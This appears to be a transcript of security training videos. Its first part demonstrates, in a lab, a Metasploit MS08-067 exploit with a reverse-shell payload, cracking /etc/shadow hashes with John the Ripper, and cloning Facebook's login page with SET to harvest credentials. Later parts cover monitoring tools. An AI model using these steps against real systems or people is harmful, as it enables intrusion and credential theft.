IT technicians to test the strength of their networks and hosts on those networks. But in the wrong hands those
same tools could be used to exploit vulnerabilities for purposes that are nefarious. Common Exploit Tools are
available for all platforms. So, Windows based as well as Unix and Linux based. In some cases some of the
exploit tools can even run on a mobile device. Some of the tools are for free and other tools are not. Some
common examples of tools include dsniff. dsniff is a suite of tools that are used for network auditing and
penetration testing where there is a focus on trying to sniff out network passwords. Webmitm, stands for web
man in the middle.
This is both a packet sniffing tool as well as a transparent proxy that can relay messages to another party, both
of which are required for a man in the middle attack. Nemesis is a packet creation and injection tool that allows
us to quickly and easily spoof any type of network packet. Aircrack-ng stands for next generation and it allows
us to crack Wi-Fi WEP, WPA, and WPA2 keys. Nessus is a widely used vulnerability scanner that will be able
to tell us what kind of vulnerabilities exist on hosts on the network or even on a single host if that's what we
chose to scan. Nmap is a widely used network scanner to map out what's on the network. Wireshark is a widely
used packet sniffer that is available for free on various platforms. Capturing network traffic with a packet
sniffer can be used to reveal things that shouldn't be on the network. In terms of hosts or protocols that are in
use or even in secure mechanisms being used over the network. In this video we talked about Common Exploit
Tools
During this video, you will learn how to use Metasploit tools to further understand the tools attackers use.
Objectives
[Topic: Exploring the Metasploit Suite of Tools. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to work with the Metasploit framework in Kali Linux. [The root@kali:/ command prompt
window is open. It displays the output of the following command: nmap -n -sV 192.168.1.242.] Metasploit is
essentially a tool that we can use for penetration testing so that we can perpetrate remote attacks over the
network against other hosts. And we do this by using specific exploits that are available within the framework
and payloads. Payloads are essentially chunks of code that we can run on a remote system. So the payloads are
designed to work together with an exploit. So currently I'm running an nmap scan on a host that I know is
running Windows XP. Now, the reality is, of course, you would have to scan the network to see if there was
anything that looked vulnerable in the first place before you knew exactly which exploit and payload to use
against that host. So what I'm looking for here is port 445. Now, if we take a look at the Windows XP
target [The screen switches to cmd.exe command prompt window.] and run netstat -an, we can see indeed that
port 445 is actually open, and it's in the listening state. This is a scary problem, we never want this for a
machine that's exposed, especially to the internet. So what now? [The screen switches back to root@kali:/
command prompt window.] Well, we're going to clear the screen, and we're going to type, msfconsole to get
into the Metasploit Framework command line console. This is going to make all of the exploits and payloads
that we need to pair together available for us. Allowing us also to set some variables, like the IP address of the
remote host, so that we can run the exploit against it. Now that we're in the msf interactive prompt, the first
thing we can do is type show exploits to get an idea of how many of these exploits are actually there. So you
need to have a sense of which exploit you want to use, and that can be done with some very basic searching or
through experience in using the Metasploit framework.
So we can see the list that has scrolled by of various exploits that are available, and especially related to
Windows and VNC and client buffer overflows and so on. At the same time, we can also type, show payloads
to see the payloads that are available that we would pair with those exploits. And remember that payloads are
essentially pieces of code that we actually would end up running on a remote system when we exploit it. So we
have a list here available as well. So what we're going to do in this case is, we're going to type use exploits/.
And in our example we want to take advantage of port 445, which is the SMB, or Server Message Block port
that we saw was available on that host. So we're going to use exploit/windows/smb. And with a bit of research,
we can figure out exactly which exploit we need to use, which I've already gone and done. So I'm going to go
ahead and enter it here, and I'll press Enter. [Dan executes the following command: use
exploits/windows/smb/ms08_067_netapi. The prompt changes to msf exploit(ms08_067_netapi).] And it puts
me in to that exploit, so I'm ready to work with it. So for that exploit, I'm going to set the remote host variable
RHOST to the IP of the target, which in this case is 192.168.1.242. Now, I know that because the nmap scan
revealed that it had port 445 open. Okay, so now that that's done, I'm going to set the appropriate payload to
pair with that exploit. So set payload, again, this requires a bit of research ahead of time, unless you're used to
using these all the time already. So I'm going to put in the path for that, I'm going to use reverse_tcp. [He
executes the following command: set payload windows/meterpreter/reverse_tcp.]
And now that I've already set my remote host variable RHOST, I'm going to have to set my local host or
LHOST variable, which is going to be the IP address of the machine where I'm running this. Where I want any
return traffic to come back to. So I'm going to say set LHOST 192.168.1.91. That is the IP address of this
Linux host. I'm going to set a port too, so set LPORT, let's say, 1234. And now I'm going to run the exploit by
typing in exploit. The thing to be careful of with this is to be patient. So depending on your network and the
type of exploit you're trying to run, it may take longer than you might expect before you get a response back.
So just be patient, we're going to go ahead and wait a minute and then see what happens. Okay, so it worked.
We can now see it detected that it was a Windows XP machine and it opened up a Meterpreter session. So this
is good news from the sense of being able to successfully exploit port 445 on that host. So now if I were to
type ipconfig, it's actually running on that remote machine. Also, if I were to type shell, it's going to give me a
remote Windows shell, even though I'm here in Linux running the Metasploit framework.
So from here, I can do pretty much whatever I please on that Windows host. [He executes the dir command.] I
can get files there, delete files, poke around, and so on. In this video, we took a look at how to work with the
Metasploit framework.
Learn how to use Kali Linux tools to further understand the tools attackers use.
Objectives
[Topic: Exploring the Kali Linux Suite of Tools. The presenter is Dan Lachance.] In this video, we'll take a
look at Kali Linux. [The Kali Linux Downloads page of the www.kali.org web site is open. Running along the
top of the page are six tabs, which are Blog, Downloads, Training, Documentation, Community, and About
Us. The Downloads tab is selected by default. The page also includes a Download Kali Linux Images section
that lists various Kali Linux images with their size and version.] Kali Linux is a free downloadable distribution
of Linux with hundreds of security tools built in. It stems from the older BackTrack auditor which previous to
that was the Linux auditor, although those projects have since been discontinued. Here on the kali.org
webpage, we have the option of downloading ISO images for Kali Linux, whether it's 64 or 32-bit. And you
can run it right from the ISO, even by burning it to a DVD. When you boot up you even have the option of
installing it on a local hard disk. With most versions of Kali Linux, you log in as user root, R-O-O-T, and the
password is T-O-O-R, in other words, root backwards. So, once we're into Kali Linux, we have a GUI
environment. [The Kali Linux GUI is open on screen. Running along the top is a menu bar with Applications
and Places drop-down menus. The taskbar is present on the left-hand side of the screen.] Although, when you
boot up, you do have numerous options to choose from. Here I've selected the default, which takes me into the
GUI mode. From the Applications menu up in the upper left, we can go through all the different categories of
tools, such as Information Gathering, or Reconnaissance Tools. [Dan clicks the Applications menu. A drop-
down list appears that has various options such as Information Gathering, Vulnerability Analysis, and so on.
He points to the Information Gathering option and a flyout menu appears that has various options such as
dmitry, nmap, sparta, and so on.]
So we can see for instance over, there we've got options like nmap and even the graphical sparta tool, which
can use other things in the background like nmap to do discovery of devices on the network. We've got
Vulnerability Analysis where we've got tools available. Web Application Analysis, Database Assessment
Tools, even Password Attacks such as the John the Ripper tool. We've got Wireless Attacks so that we can
crack into WEP, WPA, or even WPA2 protected wi-fi networks. We've also got a number of Exploitation
Tools such as the Metasploit framework, and the social engineering toolkit or SE toolkit. In the Sniffing and
Spoofing section we've got the standard options like Wireshark for packet sniffing. We've also got interesting
tools like driftnet, which allow us to view images that others are viewing on the network, literally, as in
pictures. There are other Forensics tools available here. We've also got some Reporting Tools, and then we've
got the Usual Applications of course that are available in any Linux distribution. In the left hand bar we can
also start a Terminal shell [He clicks the Terminal icon from the toolbar to open the root@kali:~ terminal.] if
we want to do stuff at the command line. Now some of the tools available in Kali Linux are graphical based,
whereas others are entirely done at the command line. In this video we learned about Kali Linux.
crack passwords
[Topic: Password Cracking. The presenter is Dan Lachance.] In this video, I'll demonstrate how to crack
passwords. [The root@kali:~ command prompt is open.] Password cracking can be done using many different
techniques, from social engineering, where we trick someone that's unsuspecting into divulging their password.
Or we might use some kind of brute-forcing tool like John the Ripper, which we'll examine here, which can
take a list of possible passwords and apply it against an account until it gets a match. Or we might use some
kind of other tool where we go to spoofing of an entire website. Where we fool people into going to this
website to put in their credentials and we have an easy way to get passwords that way as well. We could even
use tools that would look at the resultant hash of a password and reverse-engineer it mathematically to try to
derive the originating password. So there are many ways to do it. Let's start here in Kali Linux by using the
command useradd to create a user called jdoe. [Dan executes the following command: useradd jdoe.] We'll
then use the passwd or password command to set a password for that account. [He executes the following
command: passwd jdoe. He is prompted to Enter new UNIX password.] This is the account that we're going to
try to brute force using the John the Ripper tool included in Kali Linux. [He is prompted to Retype new UNIX
password, which is then updated successfully.] Now if I cat the /etc/passwd file and grep it for jdoe, [He
executes the following command: cat /etc/passwd | grep jdoe.] then we're going to see our newly created user.
However, we don't see the password and that's because the password is in the shadow file. Let's bring up that
previous command but let's just change the file name from passwd to shadow. [He executes the following
command: cat /etc/shadow | grep jdoe.] Okay, now we can see user jdoe and then after that we see a colon
which is the delimiter for all the different items in this file, followed by this long password hash.
We're going to use the unshadow command to put the contents of these two files together for ease of trying to
crack the password. So I'm going to type unshadow /etc/passwd /etc/shadow and then we're going to give it an
output redirection symbol. I want this to be called password_files. Okay, now why don't we take a look here.
Let's use the vi command and go into /usr/share/john because we're going to use John the Ripper tool. I want to
take a look at the password list file that's supplied here. Of course, it could be modified, you could use
different languages, different types of terms like legal or medical terms. [He executes the following command:
vi /usr/share/john/password.lst.] So here, for instance, notice I've added the first entry here of, Pa$$w0rd in
variation. That is actually what I set is the jdoe password. Now it's not always going to be as simple as brute
forcing with a list of passwords and cracking the password. Sometimes it works, other times it doesn't. But the
nice thing about using a tool like John the Ripper is that it automates the attempts. You don't have to try it
manually. Bear in mind, if you use some kind of a brute force tool like this, it could actually lock out the
account, if intruder detection has been enabled. You know, maybe for example after three incorrect login
attempts, one after another, the account's locked for a day.
That is possible. However, as we go through this password list file, we've got all kinds of different words,
common words that are commonly used as passwords like 123abc, so we could modify this. There are plenty
of them that you could go ahead and download here as well. Just be careful if you see any of the more
offensive items in this password file but the reality is you're going to see some of those things out there. Okay,
let's get out of here. So I'm going to type :q for quit to get out of vi, or VI, the text editor. [The screen goes
back to the command prompt.] And now what we're going to do is actually go ahead and attempt to crack a
password. So I'm going to type in john, because that's the command to run the John the Ripper Password
cracking tool. --wordlist=/usr/share/john and we just looked at the file, it's called password.lst. So here we go,
password.lst, and then I'm going to give it our combination of our /etc password and shadow files which were
called password_files. I'm going to go ahead and press Enter [He executes the following command: john --
wordlist=/usr/share/john/password.lst password_files.] and we can see it's currently doing its work. So,
depending on how many passwords you have in your list files and so on will determine how long will it take.
Now, we've set up this example so it would be very simple and quick and we can see immediately the
password for user jdoe. So it's done that and it's associated with user jdoe by looking at the hash in that file. So
once this is complete, then we're ready to go. I'm going to interrupt this with Ctrl+C because we've got what
we need. Now you can also use the john command with --show and ask it to show any passwords that it's
determined already. [He executes the john --show passwords command.]
So here it tells me that the password for jdoe is, well, the variation of the word password. Although in the file,
it's a hash of it, isn't it? It's not the actual password, but here it's displaying the actual password that we could
actually use to log in as that user. Now, that's one type of way of cracking passwords. You can brute-force it,
not always effective, it also might end up locking accounts. However, it can be useful in some cases. Now,
another way that we can work with this is by essentially mimicking common websites that people would
frequent and spoofing the whole website. Basically setting up our own fake web server like for Facebook,
which we'll do in this example. Here in Kali Linux, I'm going to type setoolkit which stands for social
engineering toolkit. I'm going to go ahead and press Enter and now notice I'm in a different interactive prompt
that has SET for Social Engineering Toolkit. [The screen prompts to select from the listed menu options such
as: 1) Social-Engineering Attacks, 2) Fast-Track Penetration Testing, and so on.] So what I want to do then is
I want to start the Social Engineering Toolkit, so I'm going to go ahead and press number 1 for Social
Engineering attacks. [The screen again prompts to select from the listed menu options such as 1) Spear-
Phishing Attack Vectors, 2) Website Attack Vectors, and so on.] What I'm interested in then doing is a website
attack vectors, so number 2. [The screen now displays the another set of menu options such as 1) Java Applet
Attack Method, @0 Metasploit Browser Exploit Method, 3) Credential Harvester Attack Method, and so
on.] The next thing I want to do is credential harvesting, so I'll press number 3. [The screen again displays
menu options such as 1) Web Templates, 2) Site Cloner, and so on.] I want to clone a website so I'll press
number 2. And it wants me to pop in the IP address for my Kali Linux machine, not the website. So here I'm
going to pop in 192.168.1.91. Then it says putting the URL for the site that you want to clone. I'm going to put
in www.facebook.com. Looks like I put that in incorrectly, so I'm going to have to try that again.
Let's try that again. Site cloner, put in my local IP address, it helps when you type things in correctly. So let's
try this again, www.facebook.com. Now what it's doing is cloning the website so that it will actually be
running on that machine, it looks like the real deal. So you can see here in a web browser, [The screen
switches to a web browser. The http://192.168.1.91/ address is present in the address bar of the browser. It
displays the Facebook login page, which includes fields for username and password, and a Log In button.] if I
actually connect to my Kali Linux installation, it actually looks like the real Facebook site. So of course, what
this would require is to redirect users to this IP address, which could be done by compromising their system
and editing the hosts file or maybe making an entry in a DNS server that you've compromised. So here, I've put
in the name and the password, I'll go ahead and click Log In. Interestingly, the user actually gets redirected to
the real page, [The Facebook login page opens which has the following web address:
https://www.facebook.com/login.php.] so therefore what's interesting here is it's kind of stealth, the user doesn't
even know what's happening. Let's go back and check Linux. So back here in Linux, I'm going to go ahead and
type 99 to return back to the main menu. And then of course, I'm going to finally exit this entire tool. The next
thing to do to review the results is to go into the /var/www/html folder. [The screen switches to Kali
terminal.] And if you do an ls, you'll see a harvester file there. If you cat that file to view its contents and
perhaps pipe it to more, in case it's really long, [He executes the following command: cat harvester_2016-09-
16\ 11\:07\:02.664969.txt | more.] then you're going to start seeing some interesting information. Here I can
see [email protected], and I can see the entered password. Now remember that user doesn't really suspect that
that was a fake login page. They were redirected to the real thing and successfully got into Facebook. So, here
we have an easy way essentially of tricking people into divulging passwords. So, it's important, then, to make
sure that people's machines can't be compromised so host file entries can't redirect them to fraudulent sites and
that DNS servers are hardened so that they can't be compromised. In this video, we learned how to crack
passwords.
Table of Contents
After completing this video, you will be able to recognize the importance of continuous monitoring of various
systems.
Objectives
[Topic: Reasons for Monitoring. The presenter is Dan Lachance.] In this video, I'll talk about reasons for
monitoring. In order to effectively manage and maintain a network environment and all of the hosts and
applications it consists of. We need to be constantly monitoring all aspects of the network to ensure that
everything is performing well. And also to insure that our security controls are effective in protecting assets.
So with monitoring, we can identify changes that might have occurred that can change the security impact of a
system. So for example, if we've got remote desktop being enabled on a server, we might want a notification to
that effect. Because maybe we don't use remote desktop in our environment. Instead, we use remote
management tools from a client, to get to the Windows server. So, monitoring can also bring to light poorly
designed controls, that even might have been effective at one point in time, but are ineffective currently. So
monitoring provides ongoing oversight as to what's happening on the network and to its hosts. And to the
applications used by and running on those hosts. At the auditing level, this only works correctly if everybody is
using a separate user account when they perform network activities. Whether they're an end user or an IT
technician creating user accounts.
Transactions can also be inspected in the case of database applications, so that we can track exactly what's
happening, with the correct date and time source. And who started the action, or which device, or which
application, started the action. Monitoring can also be tweaked to focus on cyber defense. Where we can
monitor our network infrastructure, which includes devices like routers, switches, wireless access points, VPN
appliances. Now there are many ways that these can be monitored. The old standard that's been used for
decades is SNMP, the Simple Network Management Protocol, where, from a central management station, we
can reach out over the network to these SNMP compliant devices. And basically, poke and prod any statistics
that they might make available through SNMP. In some cases, we might even be able to reconfigure those
devices through SNMP. Now of course, monitoring can also apply to all of our user devices, and also servers.
We might even install an agent on those operating systems to report back detailed information periodically.
Security information and event management, or SIEM, is a standard in the IT industry.
It's a monitoring standard that's used to detect anomalies. And then to prioritize incidents and then to manage
those incidents. Now, just as is the case with a raw intrusion detection or prevention system, often, SIEM
systems need to be tweaked for a specific environment. Due to legal or regulatory reasons, we might not have a
choice but to monitor our network or specific applications. Or to set triggers for certain types of transactions
that occur, such as high-volume financial transactions. In the cloud, there is something known as CMaaS,
which stands for continuous monitoring as a service. So instead of having an on-premises continuous
monitoring solution running on our equipment, it can be run through the cloud. Monitoring is also beneficial in
the sense that it can show us areas where there are inefficiencies, where we can optimize performance. Either
of the network as a whole, or individual hosts or processes within applications. So we can ensure also that
network and systems are used properly and only by authorized users. In this video, we discussed the reasons
for monitoring.
During this video, you will learn how to distinguish the difference between common monitoring tools.
Objectives
[Topic: Common Monitoring Tools. The presenter is Dan Lachance.] In this video, I'll talk about Common
Monitoring Tools. Of the many monitoring tools available for IT networks and hosts, they share many
common features. Some monitoring tools are real-time, where they are constantly watching for certain types of
changes and they can alert or even do something about it immediately. And in some cases, this type of real-
time monitoring solution requires an agent to be installed. If this is possible, such as on an operating system.
Monitoring tools can also do a historic analysis of data to determine, for example, if there are anomalies or
times that are missing from log files. All monitoring tools should have the ability to have configurable
notifications, whether we are notifying technicians through SMS text messages, through email and so on. In
some cases, monitoring tools will also have the built-in capability of auto remediation. Where, when
something is detected, it automatically gets fixed. So, for example, if our monitoring system detects that the
Windows firewall is not enabled on a laptop, it can automatically turn it on for additional security. But in order
for that to work, there would need to be some kind of software agent running on the Windows machine. And
that's exactly what happens when we use things like network access protection in Windows environments.
There is a client-side agent or service running that allows that to be possible. Log files can be monitored
whether we're looking at the Windows environment or UNIX and Linux. In Windows, there are a numerous
event viewer logs. For the operating system, for products like PowerShell, Internet Explorer, DNS, TCP, group
policy, the list goes on and on and on. Now the reality is, we probably don't a have time to pore over all of
these logs on each and every Windows host.
So it can be configured such that when we view a log, it is filtered. We can even build a custom view log
where we only display things that are of interest, such as warnings or critical errors and so on. The same type
of thing is possible with UNIX and Linux. Now, in UNIX and Linux, log files for most software, exists
under /var/log. Here on a Windows Server 2012 machine, I've gone into the Windows Event Viewer and I'm
looking at the standard Windows System log. [The Event Viewer window is open. Running along the top is a
menu bar with menus like File and Action. Below that is a toolbar with various icons like back and forward
arrows. The rest of the screen is divided into four parts. The first part lists the folders of the Event viewer such
as Custom Views and Windows Logs. The Windows logs folder is expanded and it has various options such as
Application, System, and so on. The System option is selected by default. The second part displays the contents
of the option selected in the first part. It lists the events in the system in a tabular format. The table headers
are Level, Date and Time, Source, Event ID, and Task Category. The third part displays the details of the
event selected in the second part. The fourth part is titled Action and it lists the available actions for the
system and the selected event.] Well, we can see there are logs that have a level of error, information, warning
and so on. Now one of the things that we could do here is we could sort, for example, by Level. [Dan clicks
the Level table header in the second part.] So, this way we have the ability to essentially group together all of
the errors, all of the informational messages, and all the warnings. Although they won't be in chronological
order any longer. But another option is to build a Custom View. Over on the left, if I were to expand Custom
Views, I could then right-click and choose Create Custom View. [from the shortcut menu. The Create Custom
View dialog box opens. It contains two tabs, Filter and XML. The Filter tab is preselected, which displays
various filters to select from.] Now, here what I might do is build a Custom View that shows me only Error,
Critical, and Warning messages. But I can get even more detailed with my filtering because I can do it by
specific logs. So, here for instance, under Windows Logs, I'll just choose the System log. And perhaps down
under Applications and Services Logs, I'll choose Microsoft > Windows, and I'm just going to keep going
down here. And maybe for this example I'll choose GroupPolicy. So now I'm asking for Critical, Warning and
Error log entries from those specific logs. I can also specify specific event ID numbers, which indicate a
certain type of event has occurred, or I can use keywords, or do it by user or computer. But for now, I'm just
going to click OK, [The Save Filter to Custom View dialog box opens. It includes text fields for Name,
Description, and buttons such as Ok and Cancel.] and I'm going to call this Nothing But Trouble. And then I'll
click OK. So we now have a Nothing But Trouble custom log view.
And we can see over on the right, that it's filtered out, the only thing we're really seeing are Errors, Warnings
and so on. To take that a step further, I could even right-click onto my custom view listed in the left-hand
navigator. [He right-clicks the Nothing But Trouble custom view and a shortcut menu appears. It lists various
options such as Open Saved Log, Create Custom View, Attach, Task To This Custom View, and so on.] And
what I can do is attach a task to that view. [He selects the Attach Task To This Custom View option and the
Create Basic Task Wizard opens.] Essentially, as I go through this wizard, I could then determine exactly what
it is that I want to do. Maybe start a program, send an e-mail message or display a message. So basically, we
can trigger something to happen when we get a new log entry in this specific custom view. [He cancels out of
the wizard.] Now at the enterprise, large scale level, you'd probably be using some kind of a SIEM solution,
which gives you many more capabilities. But in some cases, some of these options built into the operating
system can actually be very useful. As we mentioned, we might use a SIEM, a security information and event
management solution, to monitor activity on the network and devices and applications, even in real-time. So
we can monitor data, looking for threats, and SIEM solutions even have the ability to contain and manage
incidents as they occur. Of course, we've got the standard and raw.
And the reason I say raw is because, you know, a SIEM solution could include intrusion detection and
prevention. But outside of a SIEM solution, we have these raw individual capabilities. So, including intrusion
detection systems or IDSs, which can be host-based or network-based. Intrusion detection systems can detect
anomalies and report on them or send notifications, but they don't do anything about it. Whereas, intrusion
prevention systems, be they host or network-based, not only detect anomalies and send alert to notifications or
write that information to logs. But they also can be configured to take actions to prevent the intrusion from
further completing. Supervisory control and data acquisition is often referred to as SCADA. This is a
monitoring tool set that is used in industrial environments. So, similar to SIEM, it has the ability to monitor all
aspects of the network or industrial equipment and then reporting on it in real-time. In this video, we talked
about Common Monitoring Tools.
In this video, you will learn how to monitor the Linux operating system.
Objectives
[Topic: Linus OS Monitoring Tools. The presenter is Dan Lachance.] Linux and Unix operating systems
certainly allow us to do things from the command line but also in some cases with GUI interfaces. In this video
we'll explore Linux command line OS monitoring tools. [The root@kali:~ command prompt is open.] There
are plenty of tools built into Linux that we can use to monitor various aspects of the system. The first one we'll
take a look at here is top. Now remember that Linux commands are case sensitive. So where I'm typing this in
a lowercase letters, actually matters. Now when I type in top and press Enter, I get a list of running processes
where the top users of things like CPU utilization are listed at the top of the list. And the ones that are putting
the least amount of load on the percent CPU utilization are listed further down the list.
So notably we can see the PID in the leftmost column, the process ID, followed by the USER that spawned
that process. Now in some cases the system itself will spawn processes. Further over to the right, we can see
the percent of CPU utilization and percent memory being consumed by a given running process along with the
actual command itself, listed in the rightmost column. There are also some statistics up at the top, like how
long the system has been up and running, how many users are connected, the load averages over the last
periods of time. It tells me that there are 207 tasks running in total and so on. But we can interact with this
while we're working with it. For example, if I press the letter d, I get asked to change the delay from the screen
output from this command from three seconds to something else. Maybe I'll type 0.5 and press Enter. And we
can immediately see that our update is much more frequent. I'm going to press d and we're going to go back to
every three seconds. So I'll type in 3 and press Enter.
But there are other great things we can do here in top as well. For instance, maybe we don't want to seen all of
these columns of information. We're only interested in a few. So how do we filter them out? If I press the letter
f, and of course I'm not holding Shift, so it's not an uppercase F, it's just a regular lowercase f, it takes me into
this screen where I can manage fields. So f for fields. In the left-hand column we can see whether or not there's
an asterisk next to a field name. And if there is an asterisk, it's currently being displayed. So basically, if you
use the arrow keys to move up and down and you can toggle the display of a field on and off by using your
space bar. So if I hit the space bar for a bunch of these fields I don't want to see, then the asterisk is removed,
which means that they will not appear in the screen output. And maybe I want to sort by something other than
CPU utilization, maybe by %MEM for memory. So I'll go down with my arrow keys and highlight that one,
and then what I can do is press the letter s to sort by that. Now you might say, nothing changed on the screen,
when in fact it did, if you look in the upper right. It says the current sort field is %MEM. You see, if I highlight
%CPU and press s, now up in the upper right it says current field that is being sorted is %CPU. So I'm going to
go back and sort it by memory.
Now that I'm happy with this I'll press the letter q for quit. And we're back in the top command, where we still
have a live updating changing screen every three seconds. However, we're missing some columns and now it's
sorted by percent memory instead of percent CPU. So I'm going to go ahead and press q to quit out of here. In
Unix and Linux we have manual or man pages which are help pages for Linux commands. So maybe I want to
know more about how to use the top command, maybe in batch mode where I can start writing things to files
instead of having to babysit it in real time while I watch it on the screen. So for instance, if I were to type man
space top, it opens up the man page for the top command and as I go further down, I'll just press on the Enter
key here. As I go further down through this man page, I can see all of the different ways that this command is
designed to work. And eventually, as I go further down, I'll see the various command line switches such as -b
to run in batch mode. Now the idea here is, batch mode can send output for instance to a file, so we can
examine our monitoring to a file instead of having to view it in real time. So I'm going to go ahead and press q
to get out of that man page. Now some other interesting commands in Linux and there are plenty of them,
includes things like the ps command to list processes. When I type ps with no parameters it only shows me the
running processes in this current session. So we've got our bash Linux shell, which is allowing us to type
things in the first place.
And of course at the time it was executing, ps was executing, so it shows up as well. We can also see the
process ID assigned to each of these processes in the leftmost column. However, things get interesting if I start
using command line switches like aux to view all processes, including user processes and the x is for,
processes aren't tied to a terminal, that means things that are started up by the system. [Dan executes the
following command: ps aux.] So if I do that I get a very big output. Now of course, I use the up arrow key to
bring that back. I could pipe that using my vertical pipe symbol, which I get by shifting the backslash key. I
can pipe that to more to stop after the first screen full. [He executes the following command: ps aux |
more.] This way I can see the column headings at the top. So from the left we've got the user column followed
by the process identifier %CPU, %MEM and so on. In the Unix and Linux, we could also pipe the result of a
command like ps aux to grep where we might filter for something specific. Here, I want to get information
about the running process called sshd, the ssh daemon which allows remote command line administration. [He
executes the following command: ps aux | grep sshd.] And in this case I can see that I've got a couple of
entries, ignore the last one which of course is us grepping for sshd in the first place. But I do see the first listing
here where it's referencing my ssh daemon which is running on this host. So if we want to, we can filter those
types of things out. Also in Linux, other interesting things we can do, for instance, at the disk level, is we
might use df or disk free. [He executes the df command. The output appears in a tabular format with the
following table headers: Filesystem, 1K-blocks, Used, Available, Use%, and Mounted on.] Now what I might
want to do, instead of doing this in 1k blocks is use df -h for human readable. [The output now contains a Size
column instead of the 1K-blocks column.]
Then instead, it's a little bit more readable, where I'm reading the megabytes or technically the mebabytes. And
the difference really is that a megabyte is 1000 kilobytes, where a mebabyte, and yes, that's what I said,
mebabyte, is actually 1024 kilobytes. So there is a little bit of a difference in how some Linux distributions will
display things. And technically, a mebabyte is not exactly the same thing as a megabyte. Other things I might
be interested in using for monitoring here built into most Unix and Linux distros is the tcpdump command.
This one is really cool because it's kind of like having a built in command line packet sniffer and it's been there
for decades. For instance, if I type tcpdump -i for interface, now that's a lower case i, remember case
sensitivity is important. I'll give it the name of my interface which I know is eth0. If you're not sure, you can
type ifconfig on your Unix or Linux host. I just press Enter, it's capturing everything and it's scrolling by very
quickly. So I'm going to interrupt that by pressing Ctrl+C and I'll type clear to clear my screen. I'll use the up
arrow to bring up tcpdump command. What I want to do here is capture traffic destined for a specific host. So
I'll put in the IP address here, where it's going to port 22.
So dst for destination followed by a space and the destination IP. Then after that we've got a space, the word
and, a space, the word port, and a space and 22. So I only want to capture stuff going to that IP address,
specifically to port 22. And I can also pass a -A to view everything in ASCII form instead of hex. [He executes
the following command: tcpdump -i eth0 dst 192.168.1.91 and port 22 -A.] So now we can see ssh traffic that
applies to that specific type of connection that we asked for, I'll press Ctrl+C to interrupt them. Last thing we'll
mention about tcpdump is you may want to write that stuff to a file. So I'll just bring up our previous
command, and I'll add another switch after a space. What I'm gonna add is a -w, which means write, and I'm
going to put that in a file called, let's see, capture1.cap. [He executes the following command: tcpdump -i eth0
dst 192.168.1.91 and port 22 -A -w capture1.cap.] Okay, so now I can see tcpdump is listening, normally we
would see in this case ssh traffic, we're not seeing it because instead it's being redirected to our .cap file. This
can be useful because you could let this run for a period of time, you can even schedule it as a cron job in Unix
or Linux, and then review the reports of what's been captured at some point in the future. We're going to go
ahead and press Ctrl+C to stop the capture, it tells me a few packets were captured. Finally I can use tcpdump -
r to read in that file capture1.cap. [He executes the following command: tcpdump -r capture1.cap.] And there's
the data that was captured. In this video we talked about Linux OS monitoring tools.
In this video, you will learn how to monitor the Windows OS.
Objectives
[Topic: Windows OS Monitoring Tools. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
work with Windows OS monitoring tools. Much like Unix and Linux operating systems, the Windows
operating systems, both client and server-based, contain a number of great built-in monitoring tools. Here in
Server 2012 R2, let's start by going to our Start menu and typing in perf, P-E-R-F, so that we can start up the
Windows Performance Monitor tool. The Performance Monitor tool has been built into the OS for quite a long
time, and it's still as useful as it was from day one. [The Performance Monitor tool window opens. Running
along the top is a menus bar with various menus such as File, Action, and so on. Below that is a toolbar with
various icons such as back and forward arrow. The rest of the window is divided into two parts. The first part
is the navigation pane that has a root folder named Performance. The root folder is selected by default. Below
that are three expandable folders, namely Monitoring Tools, Data Collector Sets, and Reports. The
Monitoring Tools folder is expanded and it lists the Performance Monitor option. The second part displays the
contents of the option selected in the first part. The second part is divided into two sections, Overview of
Performance Monitor and System Summary.] So I'm going to click on the Performance Monitor in the left-
hand navigator, [The second part of the window is now divided into two sections. The first section has a
toolbar at the top with various icons such as plus, pause, and so on. It also displays a real-time graph of
percent Processor Time. The second section displays a table with following table headers: Show, Color, Scale,
Counter, Instance, Parent, Object, and Computer. The table lists the processes for which the graph appears in
the first section.] where by default, we've got a real-time graph that shows us the percent processor time in
total for all processor cores. Now I could click the green plus sign at the top of this tool, [Dan clicks the plus
icon from the toolbar. The Add Counters dialog box opens. It is divided into two sections that are Available
counters and Added counters.] where I can add additional performance counter metrics that I want to monitor.
They're all categorized here alphabetically. And this list is coming from the local computer, although I could
browse the network for other remote computers and monitor them remotely. Now depending on what's
installed on the local server will determine which categories we have here, some are here no matter what. For
instance, if we're working with IPv4, well, you're always going to have that here. But depending on whether
you've installed other server rules like DNS or DHCP or SQL Server, for instance, would determine the
additional counters that you might actually see in this list. So I'm going to scroll down here to the P's, where
what I want to look for is Physical Disk.
And I'll expand that category and you can see, when you do that, you see the individual performance counter
metrics listed underneath. So I think what I'll do here is just look at the average disk queue length, which is an
indication of how many requests for disk I/O are queued up because the disk subsystem is already too busy.
Now, you need a baseline of normal activity before you can hit the panic button. Just because you've got some
value in, for instance, the average disk queue length, it will vary from one environment to another. Naturally,
in a busy disk I/O environment on a file server, you can expect higher values in the average disk queue length
than on a server that is not a file server, maybe it's just a DHCP server. So I'm going to choose that for all disk
instances, but notice I could chose a specific disk instance. So I'll choose All instances, I'll click Add, which
adds it over on the right [to the Added counters section.] and I'll click OK. [The dialog box closes and the
screen goes back to the Performance Monitor window.] And now it's been added down here, [The average
Disk Queue Length for the available physical disks are now listed in the table along with the percent
Processor Time.] we've got the average disk queue length, in total, but also we've got the individual disk
queue lengths. For the total one, I'm going to double-click on it, [The Performance Monitor Properties dialog
box opens. It included various tabs such as General and Data. The Data tab is selected by default. It includes
drop-down list boxes for Color, Scale, Width, and Style. There are also three buttons at the bottom of the
dialog box, namely OK, Cancel, and Apply.] where I can change things like the color and the width of that
specific line as it gets written to the graph. [He changes the color and width of the graph line from their
respective drop-down lists.] And we can see it listed here now a little bit more clearly at the bottom. Naturally,
as we have more disk I/O activity, we can expect that thick green bar for the average disk queue length in total
to start spiking periodically. And just because you've got a spike in a graph doesn't mean that there's
necessarily a problem.
It means, perhaps, that the server is simply doing its job, it's dealing with file I/O for instance. So, again, you
need a baseline of normal activity for your particular environment before a lot of this becomes truly
meaningful and useful to make decisions from. Speaking of making decisions and establishing baselines, over
here on the left, if I go into Data Collector Sets, [He expands the Data Collector Sets folder from the
navigation pane. It displays various subfolders such as User Defined and System.] I could build a custom,
user-defined data collector set. So I could right-click here and choose New > Data Collector Set. [The Create
new Data Collector Set wizard opens. It includes a Name textbox and two radio buttons, Create from a
template (Recommended) and Create manually (Advanced). It also has three buttons at the bottom: Next,
